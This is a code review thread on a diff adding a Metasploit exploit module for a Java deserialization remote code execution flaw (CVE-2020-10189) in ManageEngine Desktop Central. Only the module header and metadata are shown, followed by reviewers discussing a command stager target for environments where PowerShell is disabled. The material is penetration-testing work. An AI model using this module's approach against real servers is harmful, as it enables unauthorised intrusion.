modules/exploits/windows/http/desktopcentral_deserialization.rb

```diff
@@ -0,0 +1,173 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'             => 'ManageEngine Desktop Central Java Deserialization',
+      'Description'      => %q{
+        This module exploits a Java deserialization vulnerability in the
+        getChartImage() method from the FileStorage class within ManageEngine
+        Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.
+
+        "The short-term fix for the arbitrary file upload vulnerability was
+        released in build 10.0.474 on January 20, 2020. In continuation of that,
+        the complete fix for the remote code execution vulnerability is now
+        available in build 10.0.479."
+      },
+      'Author'           => [
+        'mr_me', # Discovery and exploit
+        'wvu'    # Module
+      ],
+      'References'       => [
+        ['CVE', '2020-10189'],
+        ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],
+        ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],
+        ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],
+        ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']
+      ],
+      'DisclosureDate'   => '2020-03-05', # 0day release
+      'License'          => MSF_LICENSE,
+      'Platform'         => 'windows',
+      'Arch'             => [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'Privileged'       => true,
+      'Targets'          => [
```

Comment:
Could you add a Command Stager target? I know you have Powershell here, but Powershell is starting to be disabled in quite a few environments. When that's the case this module would be left with just the Windows Command. Thoughts?

Reply:
I removed it, since it wasn't working for me. (:

Allowing `ARCH_CMD` gives the option of using your own "in-memory" stager.

Reply:
I'm adding the target back in so we can debug it. :)